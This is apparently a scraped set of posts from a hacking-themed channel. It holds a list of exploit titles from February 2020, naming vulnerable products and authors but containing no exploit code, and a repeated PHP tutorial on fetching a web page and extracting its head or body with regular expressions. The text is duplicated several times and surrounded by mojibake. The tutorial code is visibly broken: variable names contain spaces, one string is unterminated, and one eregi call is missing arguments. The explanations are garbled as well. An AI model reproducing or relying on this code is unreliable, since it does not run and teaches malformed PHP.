β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Recenly 2020 Exploite CVE 2020 :
instagram.com/UndercOdeTestingCompany
2020-02-19 DBPower C300 HD Camera - Remote Configuration Disclosure WebApps
Hardware Todor Donev
2020-02-19 Virtual Freer 1.58 -
Remote Command Execution WebApps PHP SajjadBnd
2020-02-17 Anviz CrossChex -
Buffer Overflow (Metasploit) Remote Windows
Metasploit
2020-02-17 LabVantage 8.3 -
Information Disclosure WebApps Java Joel Aviad Ossi
2020-02-17 SOPlanning 1.45 - 'users' SQL Injection WebApps PHP
J3rryBl4nks
2020-02-17 Cuckoo Clock v5.0 - Buffer Overflow Local Windows
boku
2020-02-17 SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
WebApps PHP J3rryBl4nks
2020-02-17 TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service
Path Local Windows boku
2020-02-17 WordPress Theme Fruitful 3.8 - Persistent Cross-Site
Scripting WebApps PHP Ultra Security Team
2020-02-17 Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
WebApps PHP J3rryBl4nks
2020-02-17 DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service
Path Local Windows boku
2020-02-17 MSI Packages Symbolic Links Processing - Windows 10
Privilege Escalation Local Windows nu11secur1ty
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Recenly 2020 Exploite CVE 2020 :
instagram.com/UndercOdeTestingCompany
2020-02-19 DBPower C300 HD Camera - Remote Configuration Disclosure WebApps
Hardware Todor Donev
2020-02-19 Virtual Freer 1.58 -
Remote Command Execution WebApps PHP SajjadBnd
2020-02-17 Anviz CrossChex -
Buffer Overflow (Metasploit) Remote Windows
Metasploit
2020-02-17 LabVantage 8.3 -
Information Disclosure WebApps Java Joel Aviad Ossi
2020-02-17 SOPlanning 1.45 - 'users' SQL Injection WebApps PHP
J3rryBl4nks
2020-02-17 Cuckoo Clock v5.0 - Buffer Overflow Local Windows
boku
2020-02-17 SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
WebApps PHP J3rryBl4nks
2020-02-17 TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service
Path Local Windows boku
2020-02-17 WordPress Theme Fruitful 3.8 - Persistent Cross-Site
Scripting WebApps PHP Ultra Security Team
2020-02-17 Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
WebApps PHP J3rryBl4nks
2020-02-17 DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service
Path Local Windows boku
2020-02-17 MSI Packages Symbolic Links Processing - Windows 10
Privilege Escalation Local Windows nu11secur1ty
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How grab and analyse a file ?
2 parts :
twitter.com/UndercOdeTC
1) Grab and analyze a fileCrawl and analyze a file
crawl and analyze a file is very simple. This tutorial will guide you step by step to achieve it with an example. let's start!
2) First, I have to decide the URL address we will crawl. Can be set in a script or passed in $ QUERY_STRING. For simplicity, let's set the variables directly in the script.
<?
$ Url = 'http://www.php.net' ;
?>
3) The second step, we crawl the specified file, and by file () function it exists in an array.
<?
$ url = 'http://www.php.net' ;
$ lines_array = file ( $ url );
?>
4) OK, now there are files in the array. However, the text we want to analyze may not be all on one line. To understand this file, we can simply convert the array $ lines_array into a string. We can implement it using the implode (x, y) function. If you later want to use explode (set an array of string variables), it may be better to set x to "|" or "!" Or other similar delimiters. But for our purposes, it is best to set x to a space. y is another required parameter because it is the array you want to process with implode ().
<?
$ url = 'http:;
$ lines_array = file ( $ url );
$ lines_string = implode ( '' , $ lines_array );
?>
5) Now the fetching work is done, it is time to analyze it. For the purpose of this example, we want to get everything between <head> to </ head>. In order to parse out the string, we also need something called a regular expression.
<?
$ url = 'http://www.php.net' ;
$ lines_array = file ( $ url );
$ lines_string = implode ( '' , $ lines_array );
eregi ( "<head> (. *) </ head> " , $ lines_string ,$ head );
?>
π¦How grab and analyse a file ?
2 parts :
twitter.com/UndercOdeTC
1) Grab and analyze a fileCrawl and analyze a file
crawl and analyze a file is very simple. This tutorial will guide you step by step to achieve it with an example. let's start!
2) First, I have to decide the URL address we will crawl. Can be set in a script or passed in $ QUERY_STRING. For simplicity, let's set the variables directly in the script.
<?
$ Url = 'http://www.php.net' ;
?>
3) The second step, we crawl the specified file, and by file () function it exists in an array.
<?
$ url = 'http://www.php.net' ;
$ lines_array = file ( $ url );
?>
4) OK, now there are files in the array. However, the text we want to analyze may not be all on one line. To understand this file, we can simply convert the array $ lines_array into a string. We can implement it using the implode (x, y) function. If you later want to use explode (set an array of string variables), it may be better to set x to "|" or "!" Or other similar delimiters. But for our purposes, it is best to set x to a space. y is another required parameter because it is the array you want to process with implode ().
<?
$ url = 'http:;
$ lines_array = file ( $ url );
$ lines_string = implode ( '' , $ lines_array );
?>
5) Now the fetching work is done, it is time to analyze it. For the purpose of this example, we want to get everything between <head> to </ head>. In order to parse out the string, we also need something called a regular expression.
<?
$ url = 'http://www.php.net' ;
$ lines_array = file ( $ url );
$ lines_string = implode ( '' , $ lines_array );
eregi ( "<head> (. *) </ head> " , $ lines_string ,$ head );
?>
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How grab and analyse a file ?
part 2 :
1) γLet's take a look at the code. As you can see, the eregi () function is executed in the following format:
eregi ("<head> (. *) </ Head>", $ lines_string, $ head);
2) γγ"(. *)" Means everything and can be explained For, "Analyze all things between <head> and </ head>". $ lines_string is the string we are analyzing, and $ head is the array where the analysis results are stored.
3) Finally, we can lose data. Because there is only one instance between <head> and </ head>, we can safely assume that there is only one element in the array, and that is what we want. Let's print it out.
<?
$ url = 'http://www.php.net' ;
$ lines_array = file ( $ url );
$ lines_string = implode ( '' , $ lines_array );
eregi ( "<head> (. *) </ head> " ,);
echo $ head [ 0 ];
?>
4) That's all there is to it.
<? php
$ url = 'http://www.php.net' ;
$ lines_array = file ( $ url );
$ lines_string = implode ( '' , $ lines_array );
preg_match_all ( "/ <body ([^>] . +?)> (. *) <\ / body> / is " , $ lines_string , $ m );
echo " <xmp> " ;
echo $ m [ 2 ] [ 0 ];
?>
π¦How grab and analyse a file ?
part 2 :
1) γLet's take a look at the code. As you can see, the eregi () function is executed in the following format:
eregi ("<head> (. *) </ Head>", $ lines_string, $ head);
2) γγ"(. *)" Means everything and can be explained For, "Analyze all things between <head> and </ head>". $ lines_string is the string we are analyzing, and $ head is the array where the analysis results are stored.
3) Finally, we can lose data. Because there is only one instance between <head> and </ head>, we can safely assume that there is only one element in the array, and that is what we want. Let's print it out.
<?
$ url = 'http://www.php.net' ;
$ lines_array = file ( $ url );
$ lines_string = implode ( '' , $ lines_array );
eregi ( "<head> (. *) </ head> " ,);
echo $ head [ 0 ];
?>
4) That's all there is to it.
<? php
$ url = 'http://www.php.net' ;
$ lines_array = file ( $ url );
$ lines_string = implode ( '' , $ lines_array );
preg_match_all ( "/ <body ([^>] . +?)> (. *) <\ / body> / is " , $ lines_string , $ m );
echo " <xmp> " ;
echo $ m [ 2 ] [ 0 ];
?>
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β